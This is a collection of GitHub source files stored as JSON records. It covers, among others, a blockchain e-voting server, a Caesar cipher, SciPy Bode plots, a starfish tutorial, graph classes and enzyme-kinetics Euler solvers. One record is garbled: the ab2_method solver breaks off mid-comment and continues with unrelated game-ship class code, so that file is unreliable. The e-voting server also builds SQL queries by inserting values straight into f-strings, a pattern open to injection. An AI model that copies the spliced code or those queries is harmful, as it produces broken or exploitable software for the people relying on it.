\"__main__\":\n import os\n\n DEBUG = os.environ.get(\"DEBUG\", \"false\").lower() not in [\n \"false\", \"no\", \"0\"]\n\n logging.basicConfig(\n format=\"[%(asctime)s] %(levelname)7s from %(name)s in %(pathname)s:%(lineno)d: \"\n \"%(message)s\",\n force=True,\n )\n\n logger.setLevel(level=logging.DEBUG if DEBUG else logging.INFO)\n\n st_webrtc_logger = logging.getLogger(\"streamlit_webrtc\")\n st_webrtc_logger.setLevel(logging.DEBUG)\n\n fsevents_logger = logging.getLogger(\"fsevents\")\n fsevents_logger.setLevel(logging.WARNING)\n\n main()\n","repo_name":"rahularepaka/ObjectDetectionYolov4Web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}

{"seq_id":"25188179032","text":"import json\n\n\ndef get_config(config_key: str):\n try:\n with open(\"config.json\", mode=\"r\", encoding=\"utf-8\") as f:\n config = json.loads(f.read())\n if str(config_key) in config.keys():\n return config[config_key]\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n\ndef set_config(config_key: str, value):\n try:\n with open(\"config.json\", mode=\"r\", encoding=\"utf-8\") as f:\n config = json.loads(f.read())\n except Exception as e:\n print(e)\n config = {}\n\n config[config_key] = value\n tmp = json.dumps(config)\n with open(\"config.json\", mode=\"w\", encoding=\"utf-8\") as f:\n f.write(tmp)\n","repo_name":"runo0044/OpenAI-API-DiscordBot","sub_path":"configIo.py","file_name":"configIo.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"72093828268","text":"from http.server import HTTPServer\nfrom threading import Thread\nimport requests\nimport base64\nimport json\nimport time\nimport re\n\nfrom blockchain import Blockchain\nfrom handler import Handler\nfrom db import Database\n\n'''\nThe structure would be\n\n\tBlockchains : The 
elections\n\tBlocks in each blockchain : Votes in each election\n\n'''\n\nblockchains = {}\n\ndef enqueue_voting(server):\n\t# Connect to database from \"config.json\"\n\ttry:\n\t\twith open('config.json', 'r', encoding='utf-8') as f:\n\t\t\tconfig = json.load(f)\n\t\tdb = Database(*[config[k] for k in ['host', 'username', 'password', 'database']])\n\texcept Exception as e:\n\t\tprint(f'Failed to connect to database!\\n\\t{e}')\n\t\treturn  # editor's fix: nothing to do without a database connection\n\n\t# populating the blockchains cache\n\tcursor = db.execute(\n\t\t\tf\"SELECT id, difficulty, block_id FROM blockchains\"\n\t)\n\tif cursor and cursor.rowcount > 0:\n\t\t# Go through all chains\n\t\tfor blockchain in cursor:\n\t\t\tchain_id, difficulty, block_id = blockchain\n\t\t\tchain = Blockchain(difficulty=difficulty)\n\t\t\t\n\t\t\t# Getting the head block\n\t\t\tcursor = db.execute(\n\t\t\t\tf\"SELECT data, hash FROM blocks WHERE id={block_id}\"\n\t\t\t)\n\t\t\tif not cursor or cursor.rowcount != 1:\n\t\t\t\tprint('Warning, empty blockchain with no head block detected!')\n\t\t\t\tcontinue\n\t\t\tblock_data, block_hash = cursor.next()\n\t\t\tchain.add(block_data)\n\t\t\tassert chain.blocks[-1].hash == block_hash, 'Unmatched hash!'\n\n\t\t\t# Go through all blocks in each chain (excluding the head)\n\t\t\twhile True:\n\t\t\t\tcursor = db.execute(\n\t\t\t\t\tf\"SELECT data, hash FROM blocks WHERE prev_hash='{block_hash}'\"\n\t\t\t\t)\n\t\t\t\tif not cursor or cursor.rowcount != 1:\n\t\t\t\t\tprint(f'Found {len(chain.blocks)} blocks for chain {chain_id}!')\n\t\t\t\t\tblockchains[chain_id] = chain\n\t\t\t\t\tbreak\n\t\t\t\tblock_data, block_hash = cursor.next()\n\t\t\t\tchain.add(block_data)\n\t\t\t\tassert chain.blocks[-1].hash == block_hash, 'Unmatched hash!'\n\n\tprint(f'Total blockchains: {len(blockchains)}')\n\n\twhile True:\n\t\ttime.sleep(1)\n\t\tif len(server.queue) > 0:\n\t\t\tprint('Found a vote!')\n\t\t\tvote = server.queue.pop()\n\t\t\tvote_id = vote['vote']\n\t\t\telection_id = vote['election']\n\t\t\tpublic_key = vote['public_key']\n\n\t\t\t# Sign the vote and get the signature\n\t\t\tresult = json.loads(requests.post(\n\t\t\t\t'http://localhost/blockchain/ajax.php?action=sign',\n\t\t\t\theaders={\n\t\t\t\t\t'Authorization': public_key\n\t\t\t\t},\n\t\t\t\tdata={'vote_id': vote_id}\n\t\t\t).text)\n\t\t\tif not result['success']:\n\t\t\t\tprint(f'Warning: Failed to sign vote with id {vote_id}')\n\t\t\t\tprint('Voting result', result)\n\n\t\t\t# Check for existing block chain\n\t\t\tcursor = db.execute(\n\t\t\t\tf\"SELECT id FROM blockchains WHERE election_id={election_id}\"\n\t\t\t)\n\t\t\tif cursor:\n\t\t\t\tif cursor.rowcount == 0:\n\t\t\t\t\t# Using a default difficulty\n\t\t\t\t\tdifficulty = 4\n\n\t\t\t\t\t# Create a new block chain\n\t\t\t\t\tchain = Blockchain(difficulty=difficulty)\n\n\t\t\t\t\t# Encrypt the block data\n\t\t\t\t\tblock_data = json.loads(requests.post(\n\t\t\t\t\t\t'http://localhost/blockchain/ajax.php?action=encrypt',\n\t\t\t\t\t\theaders={\n\t\t\t\t\t\t\t'Authorization': public_key\n\t\t\t\t\t\t},\n\t\t\t\t\t\tdata={'data': json.dumps({'vote_id': vote_id})}\n\t\t\t\t\t).text)['data']\n\n\t\t\t\t\t# Adding new head block to it\n\t\t\t\t\tchain.add(block_data)\n\n
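\t\t\t\t\t# NOTE (editor, hedged): chain.add() presumably mines a nonce meeting the\n\t\t\t\t\t# configured difficulty (see Blockchain in blockchain.py), so the nonce and\n\t\t\t\t\t# hash persisted below are already proof-of-work checked.\n\t\t\t\t\t# Insert the head block into the blocks table\n\t\t\t\t\tblock = chain.blocks[-1]\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t'INSERT INTO blocks ' +\n\t\t\t\t\t\t'(data, nonce, prev_hash, hash) ' + \n\t\t\t\t\t\t'VALUE (%s, %s, %s, %s)', \n\t\t\t\t\t\t(block.data, block.nonce, block.prev, 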
block.hash)\n\t\t\t\t\t)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Block successfully inserted into db')\n\t\t\t\t\t\n\t\t\t\t\t# Get the block id from the hash\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t\tf\"SELECT id FROM blocks WHERE hash='{block.hash}'\"\n\t\t\t\t\t)\n\t\t\t\t\tblock_id = cursor.next()[0]\n\n\t\t\t\t\t# Insert the chain into blockchains table\n\t\t\t\t\tcursor = db.execute('''\n\t\t\t\t\t\tINSERT INTO blockchains (block_id, election_id, difficulty)\n\t\t\t\t\t\t VALUE (%s, %s, %s)\n\t\t\t\t\t''', (block_id, election_id, difficulty))\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Blockchain successfully inserted into db')\n\n\t\t\t\t\t# Get the inserted blockchain id and insert into cache\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\tf\"SELECT id FROM blockchains WHERE election_id={election_id}\"\n\t\t\t\t\t)\n\t\t\t\t\tblockchains[int(cursor.next()[0])] = chain\n\t\t\t\telif cursor.rowcount == 1:\n\t\t\t\t\t# Use that existing block chain\n\t\t\t\t\tchain = blockchains[int(cursor.next()[0])]\n\n\t\t\t\t\t# Encrypt the block data\n\t\t\t\t\tblock_data = json.loads(requests.post(\n\t\t\t\t\t\t'http://localhost/blockchain/ajax.php?action=encrypt',\n\t\t\t\t\t\theaders={\n\t\t\t\t\t\t\t'Authorization': public_key.encode('utf-8')\n\t\t\t\t\t\t},\n\t\t\t\t\t\tdata={'data': json.dumps({'vote_id': vote_id})}\n\t\t\t\t\t).text)['data']\n\n\t\t\t\t\t# Adding new head block to it\n\t\t\t\t\tchain.add(block_data)\n\n\t\t\t\t\t# Insert the head block into the blocks table\n\t\t\t\t\tblock = chain.blocks[-1]\n\t\t\t\t\tcursor = db.execute(\n\t\t\t\t\t\t'INSERT INTO blocks ' +\n\t\t\t\t\t\t'(data, nonce, prev_hash, hash) ' + \n\t\t\t\t\t\t'VALUE (%s, %s, %s, %s)', \n\t\t\t\t\t\t(block.data, block.nonce, block.prev, block.hash)\n\t\t\t\t\t)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\tprint('Info: Block successfully inserted into db.')\n\nif __name__ == '__main__':\n\tserver = HTTPServer(('0.0.0.0', 8000), Handler)\n\tserver.queue = [] # The queue for the incoming votes\n\t\n\tThread(target=enqueue_voting, daemon=True, args=(server, )).start()\n\tserver.serve_forever()\n","repo_name":"xxMrPHDxx/blockchain-evoting-backend","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"2959859092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 23 14:10:14 2013\nDrawing Bode plots with scipy.signal\nThe functions used here are available in scipy version 0.11.0 and later\n@author: ***\n\"\"\"\n\nfrom scipy import signal  # import scipy.signal\nimport matplotlib.pyplot as plt  # import pyplot\nimport matplotlib as mpl\n\nmpl.rcParams['axes.grid']=True\n\n# signal.lti is used to define the transfer function\n# The first element is the numerator of the transfer function, the second is the denominator.\n# If the numerator/denominator has multiple elements, the first is the highest-order term.\ns1 = signal.lti([100], [1,100])\n# From the transfer function, return the frequencies, magnitude (dB) and phase (deg)\nw, mag, phase = s1.bode()\n\n# Plot the graphs\nplt.figure()\nplt.subplot(211)\nplt.semilogx(w, mag)\nplt.subplot(212)\nplt.semilogx(w, phase)\nplt.show()  # editor's addition: display the figure when run as a script\n","repo_name":"rutaro/study_meeting","sub_path":"scipytest_bode.py","file_name":"scipytest_bode.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"42140091067","text":"def calc_gep(a, b):\n return abs(int(a) - int(b))\n\ntarget_channel = input()\nbroken_count = int(input())\n\nif broken_count != 0:\n broken_number = list(map(int, input().split()))\n available_number = []\n\n for number in range(10):\n if number not in broken_number:\n 
available_number.append(number)\n\nelse:\n available_number = [number for number in range(0, 10)]\n\nif abs(int(target_channel) - 100) <= len(target_channel) or len(available_number) == 0:\n print(abs(int(target_channel) - 100)) \n\nelse:\n all_channel = [str(number) for number in available_number]\n before_boundary = 0\n count = 1\n close_channel = all_channel[0]\n push_count = 0\n max_gap = 10000000001\n\n while count < len(target_channel) + 1:\n next_node = []\n \n for current_element in all_channel[before_boundary:]:\n for number in available_number:\n gen_number = current_element + str(number)\n if calc_gep(gen_number, target_channel) < max_gap:\n max_gap = calc_gep(gen_number, target_channel)\n next_node.append(current_element + str(number))\n\n before_boundary = len(all_channel)\n\n for channel in next_node:\n if channel[0] != \"0\":\n all_channel.append(channel)\n\n count += 1\n\n for number in all_channel:\n if calc_gep(number, target_channel) < calc_gep(close_channel, target_channel):\n close_channel = number\n\n push_count = len(str(int(close_channel)))\n\n if calc_gep(close_channel, target_channel) + push_count > calc_gep(target_channel, 100):\n print(calc_gep(target_channel, 100))\n\n else:\n print(push_count + calc_gep(close_channel, target_channel))\n","repo_name":"W1nU/algorithm","sub_path":"first/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40643178600","text":"import sys\n\n\ndef encode(string, shift):\n try:\n string.encode('ascii')\n except UnicodeEncodeError:\n raise Exception(\"The script does not support your language yet.\")\n\n lower = [chr(i) for i in range(ord('a'), ord('z') + 1)]\n upper = [chr(i) for i in range(ord('A'), ord('Z') + 1)]\n result = \"\"\n for i in string:\n if i in lower:\n result += lower[(lower.index(i) + shift) % 26]\n elif i in upper:\n result += upper[(upper.index(i) + shift) % 26]\n else:\n result += i\n return result\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 4:\n if sys.argv[1] == 'encode':\n print(encode(sys.argv[2], int(sys.argv[3])))\n elif sys.argv[1] == 'decode':\n print(encode(sys.argv[2], -int(sys.argv[3])))\n else:\n print('incorrect operation or option')\n else:\n print('invalid number of arguments')\n","repo_name":"djoye21school/Piscine_DS","sub_path":"day01/ex09/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1379096570","text":"#!/usr/bin/env python3\n\n# ~~=) All Rights Reversed (=~~\n\nimport sys\n\n# Get input from stdin or argv[1]\nif len(sys.argv) == 1:\n\tf = sys.stdin\nelse:\n\tf = open(sys.argv[1])\n\n# Read the whole file into binstr\nbinstr = f.read()\n# Done with f, close it\nf.close()\n# Add 0b at beginning and remove all whitespace\nbinstr = '0b' + binstr.replace(' ', '').replace('\\t', '').replace('\\n', '')\n# Convert to ascii\nn = int(binstr, 2)\ns = n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()\nprint(s)\n","repo_name":"AlbertVeli/misc-tools","sub_path":"binstringtoascii.py","file_name":"binstringtoascii.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30267711419","text":"import sys\nimport seiscomp.client\nimport seiscomp.core\nfrom scstuff.inventory import InventoryIterator\n\nclass 
InvApp(seiscomp.client.Application):\n def __init__(self, argc, argv):\n seiscomp.client.Application.__init__(self, argc, argv)\n self.setMessagingEnabled(False)\n self.setDatabaseEnabled(True, True)\n self.setLoggingToStdErr(True)\n self.setLoadInventoryEnabled(True)\n\n def run(self):\n now = seiscomp.core.Time.GMT()\n lines = []\n coord = {}\n inv = seiscomp.client.Inventory.Instance().inventory()\n\n for (network, station, location, stream) in InventoryIterator(inv, now):\n n,s,l,c = network.code(), station.code(), location.code(), stream.code()\n if (n,s) in coord:\n continue\n\n coord[n,s] = (station.latitude(), station.longitude(), station.elevation())\n\n for (n,s) in coord:\n lat,lon,elev = coord[n,s]\n lines.append(\"%-2s %-5s %8.4f %9.4f %4.0f\" % (n,s,lat,lon,elev))\n\n lines.sort()\n for line in lines:\n print(line)\n return True\n\n\ndef main(argc, argv):\n app = InvApp(argc, argv)\n app()\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n argv = sys.argv\n main(argc, argv)\n","repo_name":"jsaul/scstuff","sub_path":"apps/dump-station-coordinates/dump-station-coordinates.py","file_name":"dump-station-coordinates.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42810186112","text":"from rest_framework import serializers\n\nfrom sponsor.models import Sponsor\n\nclass SponsorSerializer(serializers.ModelSerializer):\n\n class Meta:\n\n model = Sponsor\n fields = (\n 'id',\n 'division',\n 'grade',\n 'support_date',\n 'support_amount',\n 'title',\n 'sub_title',\n 'department',\n 'establish_date',\n 'logo_url',\n 'slogan',\n 'location',\n 'description',\n 'keyword',\n 'email',\n 'homepage',\n\n 'created',\n )","repo_name":"HodongMan/unit-server-1.0","sub_path":"sponsor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040095764","text":"\"\"\"\n.. _howto_tracebuildingstrategies:\n\nWhen to Use Each ``TraceBuildingStrategies``\n============================================\n\nIn order to multiplex image-based transcriptomics assays beyond the number of spectrally distinct\nfluorophores, assays use multiple rounds of imaging. Before every round, RNA transcripts or\namplicons are relabeled so that if you trace a spot across rounds, the spot will have a\npattern of signals. This pattern should match a :term:`codeword` in the\n:term:`codebook`.\n\nThere are three different ``TraceBuilders`` that can be used to trace spots in\n:py:class:`.SpotFindingResults` into an :py:class:`.IntensityTable` or\n:py:class:`.DecodedIntensityTable`. It is important to choose the correct ``TraceBuilder`` that\nmatches the codebook design and data.\n\n.. image:: /_static/design/tracebuilder_decisiontree.png\n :scale: 50 %\n :alt: Which TraceBuilder To Use\n :align: center\n\nThe chosen ``TraceBuilder`` must also be compatible with how the :py:class:`.SpotFindingResults`\nwas generated. :py:class:`.FindSpotsAlgorithm`\\s can be run with or without a ``reference_image``.\nIf run with a ``reference_image`` then every :py:class:`.PerImageSliceSpotResults` in\n:py:class:`.SpotFindingResults` will have the same spots for every (round, channel) image volume.\nThis is necessary for :py:func:`.build_spot_traces_exact_match` but not recommended for\n:py:func:`.build_traces_sequential` and :py:func:`.build_traces_nearest_neighbors`.\n\n.. 
list-table:: ``TraceBuildingStrategy``\n :widths: auto\n :header-rows: 1\n\n * - Method\n - Description\n - Reference Image\n * - ``SEQUENTIAL``\n - Build traces for every detected spot by setting intensity values to zero for all rounds\n and channels the spot was not found in (i.e. every trace will have only 1 non-zero value)\n - Incompatible\n * - ``EXACT_MATCH``\n - Build traces by combining intensity values of spots from every round and channel in the\n exact same location as spots in ``reference_image``\n - Required\n * - ``NEAREST_NEIGHBOR``\n - Build traces by combining intensity values of spots from rounds and channels nearest to the\n spots in the ``anchor_round``\n - Not recommended; will have same result as EXACT_MATCH\n\"\"\"\n\n# Load and process ISS images to find spots with and without reference image\nfrom starfish.image import ApplyTransform, LearnTransform, Filter\nfrom starfish.types import Axes\nfrom starfish import data, display, FieldOfView\nfrom starfish.spots import FindSpots\n\nexperiment = data.ISS()\nfov = experiment.fov()\nimgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images\ndots = fov.get_image(\"dots\") # reference round for image registration\n\n# filter raw data\nmasking_radius = 15\nfilt = Filter.WhiteTophat(masking_radius, is_volume=False)\nfilt.run(imgs, in_place=True)\nfilt.run(dots, in_place=True)\n\n# register primary images to reference round\nlearn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)\ntransforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func=\"max\"))\nwarp = ApplyTransform.Warp()\nwarp.run(imgs, transforms_list=transforms_list, in_place=True)\n\n# run blob detector on dots and on image stack\nbd = FindSpots.BlobDetector(\n min_sigma=1,\n max_sigma=10,\n num_sigma=30,\n threshold=0.01,\n measurement_type='mean',\n)\ndots_max = dots.reduce((Axes.ROUND, Axes.ZPLANE), func=\"max\")\nspots_from_ref = bd.run(image_stack=imgs, reference_image=dots_max)\nspots_from_stack = bd.run(image_stack=imgs)\n\n\n####################################################################################################\n# Typical pipelines will set the ``trace_building_strategy`` as an argument in the\n# :py:class:`.DecodeSpotsAlgorithm` but here the underlying code is exposed to reveal what the\n# different :py:class:`.IntensityTable`\\s look like depending on which ``TraceBuilder`` is used.\n\nfrom starfish.core.spots.DecodeSpots.trace_builders import build_spot_traces_exact_match, \\\n build_traces_sequential, build_traces_nearest_neighbors\n\nprint('Build trace with EXACT_MATCH')\nprint(build_spot_traces_exact_match(spots_from_ref))\n\n####################################################################################################\n# When building spot traces with EXACT_MATCH, every feature has a value in each round and channel\n# because a ``reference_image`` was used in spot finding.\n\nprint('\\nBuild trace with SEQUENTIAL')\nprint(build_traces_sequential(spots_from_stack))\n\n####################################################################################################\n# When building spot traces with SEQUENTIAL, every feature has only one non-zero round and channel\n# because :py:func:`.build_traces_sequential` automatically assigns a zero value to all other\n# rounds and channels.\n\nprint('\\nBuild trace with NEAREST_NEIGHBORS')\nprint(build_traces_nearest_neighbors(spots_from_stack, 
search_radius=5))\n\n####################################################################################################\n# The same :py:func:`.build_traces_nearest_neighbors` applied to spots found in\n# :py:class:`.ImageStack` *with* a ``reference image`` guarantees a spot to be found in every\n# round of :py:class:`.SpotFindingResults`.","repo_name":"spacetx/starfish","sub_path":"examples/how_to/tracebuildingstrategies.py","file_name":"tracebuildingstrategies.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"}

{"seq_id":"21292416125","text":"from node import Node\nfrom edge import Edge\nfrom community import Community\n\nclass Graph:\n \"\"\"\n A collection of nodes and arcs between nodes that represent a graph\n \"\"\"\n\n def __init__(self, name, nodes=None, edges=None, communities=None):\n \"\"\"\n Constructs a graph, can be an empty graph\n :param name: Name of the graph\n :param nodes: List of nodes that make up a graph\n :param edges: List of edges that connect nodes\n :param communities: List of communities that are part of the graph\n \"\"\"\n self.name = name\n self.nodes = [] if nodes is None else nodes\n self.edges = [] if edges is None else edges\n self.communities = [] if communities is None else communities\n\n def getName(self):\n return self.name\n\n def getNodes(self):\n return self.nodes\n\n def addNode(self, newNode):\n self.nodes.append(newNode)\n\n def getEdges(self):\n return self.edges\n\n def getTotalEdgeWeight(self):\n \"\"\"\n Sums the weights of all edges in the graph\n :return: m: the total edge weight\n \"\"\"\n m = 0\n for edge in self.getEdges():\n m += edge.getWeight()\n return m\n\n def addEdge(self, newEdge):\n self.edges.append(newEdge)\n\n def getCommunities(self):\n return self.communities\n\n def addCommunity(self, newCommunity):\n self.communities.append(newCommunity)\n\n def getSize(self):\n return\n\n\ndef makeGraphFromDict(name, dict):\n \"\"\"\n Builds a Graph that is equivalent to a dictionary representation of a graph.\n Essentially a secondary constructor using a dict\n :param dict: Dictionary representation of a graph\n :return: Graph object that is equivalent to dict\n \"\"\"\n\n graph = Graph(name)\n communities = []\n nodes = []\n\n for nodeID, nodeValues in dict.items():\n c = Community(nodeValues[1])\n n = Node(nodeID)\n if n not in nodes:\n nodes.append(n)\n for node in nodes:\n if node == n:\n n = node\n for neighborID, arcWeight in nodeValues[0].items():\n n2 = Node(neighborID)\n if n2 not in nodes:\n nodes.append(n2)\n for node in nodes:\n if node == n2:\n n2 = node\n e = Edge(n, n2, arcWeight)\n if e not in graph.getEdges():\n graph.addEdge(e)\n n.addConnection(e)\n n2.addConnection(e)\n if c not in communities:\n communities.append(c)\n for comm in communities:\n if c == comm:\n c = comm\n c.addMemberNode(n)\n\n
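 # NOTE (editor's sketch): the expected input shape, inferred from the loops above, is\n # {node_id: ({neighbor_id: edge_weight, ...}, community_id), ...}, e.g.\n # makeGraphFromDict(\"g\", {\"a\": ({\"b\": 1.0}, 0), \"b\": ({\"a\": 1.0}, 0)})\n for node in nodes:\n graph.addNode(node)\n for c in communities:\n graph.addCommunity(c)\n\n return 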
graph\n","repo_name":"Spatika-Ganesh/datawhisperers","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24936171698","text":"from collections import namedtuple\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nResult = namedtuple(\"Result\", [\"S\", \"E\", \"ES\", \"P\", \"kf\", \"kr\", \"kc\", \"h\", \"T\"])\n\ndef forward_euler(S0, E0, ES0, P0, kf, kr, kc, h, T):\n total_steps = int(T/h + 1)\n S = np.zeros(total_steps)\n E = np.zeros(total_steps)\n ES= np.zeros(total_steps)\n P = np.zeros(total_steps)\n S[0] = S0\n E[0] = E0\n ES[0]= ES0\n P[0] = P0\n\n t = 0\n i = 0\n\n dS = lambda i : -kf*E[i]*S[i] + kr*ES[i]\n dE = lambda i : -kf*E[i]*S[i] + kr*ES[i] + kc*ES[i]\n dES= lambda i : kf*E[i]*S[i] - kr*ES[i] - kc*ES[i]\n dP = lambda i : kc*ES[i]\n\n while i+1 < total_steps:\n S[i+1] = S[i] + h*dS(i)\n E[i+1] = E[i] + h*dE(i)\n ES[i+1]= ES[i]+ h*dES(i)\n P[i+1] = P[i] + h*dP(i)\n t += h\n i += 1\n\n return Result(S, E, ES, P, kf, kr, kc, h, T)\n\ndef ab2_method(S0, E0, ES0, P0, kf, kr, kc, h, T):\n total_steps = int(T/h + 1)\n S = np.zeros(total_steps)\n E = np.zeros(total_steps)\n ES= np.zeros(total_steps)\n P = np.zeros(total_steps)\n S[0] = S0\n E[0] = E0\n ES[0]= ES0\n P[0] = P0\n\n dS = lambda i : -kf*E[i]*S[i] + kr*ES[i]\n dE = lambda i : -kf*E[i]*S[i] + kr*ES[i] + kc*ES[i]\n dES= lambda i : kf*E[i]*S[i] - kr*ES[i] - kc*ES[i]\n dP = lambda i : kc*ES[i]\n\n\n # First we need to find the first value for the concentrations\n # by doing forward euler at a step size of 0:\n self.centerx -= self.ai_settings.ship_speed_factor\n\n #Update rect object from self.center\n self.rect.centerx = self.centerx\n\n def blitme(self):\n \"\"\"Draw the sip at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.center = self.screen_rect.centerx","repo_name":"Securityinspired0/alieninvasion-repo1","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71299386668","text":"'''\nInformation:\n Use this function to add number no matter how many.\n\nSyntax:\n add([...])\n\nExample:\n add([1, 2, 3, 4, 5])\n add([142, 32532, 523, 25325])\n\nNote:\n - You need to add this inside the print statement so as to get the result printed in the terminal.\n'''\n\ndef add(numberlist):\n result = 0\n for number in numberlist:\n result += number\n return result\n\n\"\"\"\nMade by:\n Bhavyadeep31\n\"\"\"","repo_name":"Bhavyadeep31/jervismath","sub_path":"jmath/Arithmetic/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38985041021","text":"def found(text, keys, mode='all', substring=False):\n \"\"\"\n Searches key elements in given text string(s) with three different modes: all, any, none\n\n Args:\n text: (list or str)\n keys: (list) keys to search in texts\n mode: (str) ['all', 'any', 'none']\n substring: (bool) search in substrings in given text string(s) or fully match\n\n Returns:\n result: (bool)\n\n \"\"\"\n assert mode in ['all', 'any', 'none']\n if isinstance(text, str):\n text = [text]\n\n count = 0\n for key in keys:\n for item in text:\n if not substring and key.lower() == item.lower() or substring 
and key.lower() in item.lower():\n count += 1\n break\n\n if mode == 'all':\n return len(keys) == count\n elif mode == 'any':\n return count > 0\n else:\n return count == 0\n","repo_name":"MaxinAI/bank_of_england_news_analysis","sub_path":"model/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34296761072","text":"from django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n path(\"clients\", Clients.as_view(), name=\"clients\"),\n path(\"clients/\", ClientInformation.as_view(), name=\"client_information\"),\n path(\"products\", Products.as_view(), name=\"products\"),\n path(\"products/\", ProductInformation.as_view(), name=\"product_information\"),\n path(\"migration\", MigrationAssistant.as_view(), name=\"migration\"),\n]","repo_name":"alejofl/tpo-bd2","sub_path":"turtle_inc/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36763579902","text":"# -----------------------------------------------------------\r\n# Consider a sequence u where u is defined as follows:\r\n# \r\n# The number u(0) = 1 is the first one in u.\r\n# For each x in u, then y = 2 * x + 1 and z = 3 * x + 1 must be in u too.\r\n# There are no other numbers in u.\r\n# Ex: u = [1, 3, 4, 7, 9, 10, 13, 15, 19, 21, 22, 27, ...]\r\n# \r\n# 1 gives 3 and 4, then 3 gives 7 and 10, 4 gives 9 and 13, then 7 gives 15 and 22 and so on...\r\n# \r\n# Task:\r\n# Given parameter n the function dbl_linear (or dblLinear...) returns the element u(n) of the ordered (with <) sequence u (so, there are no \r\n# duplicates).\r\n# \r\n# Example:\r\n# dbl_linear(10) should return 22\r\n# \r\n# Note:\r\n# Focus attention on efficiency\r\n# -----------------------------------------------------------\r\n\r\ndef dbl_linear(n):\r\n arr = [1] \r\n y, z = 0, 0\r\n while len(arr) <= n: \r\n i = 2*arr[y] + 1 \r\n j = 3*arr[z] + 1 \r\n if i > j: \r\n arr.append(j)\r\n z += 1 \r\n elif i < j: \r\n arr.append(i)\r\n y += 1 \r\n else: \r\n arr.append(i)\r\n y += 1 \r\n z += 1\r\n return arr[n]\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. 
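A brief usage sketch for the `found` helper above (illustrative only; it assumes the function is importable from the surrounding helpers module):

# Substring search with the three modes; `found` returns a bool.
texts = ["Bank of England", "interest rates rise"]
assert found(texts, ["bank"], mode="any", substring=True)
assert found(texts, ["bank", "rates"], mode="all", substring=True)
assert found(texts, ["bitcoin"], mode="none")  # exact match by default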
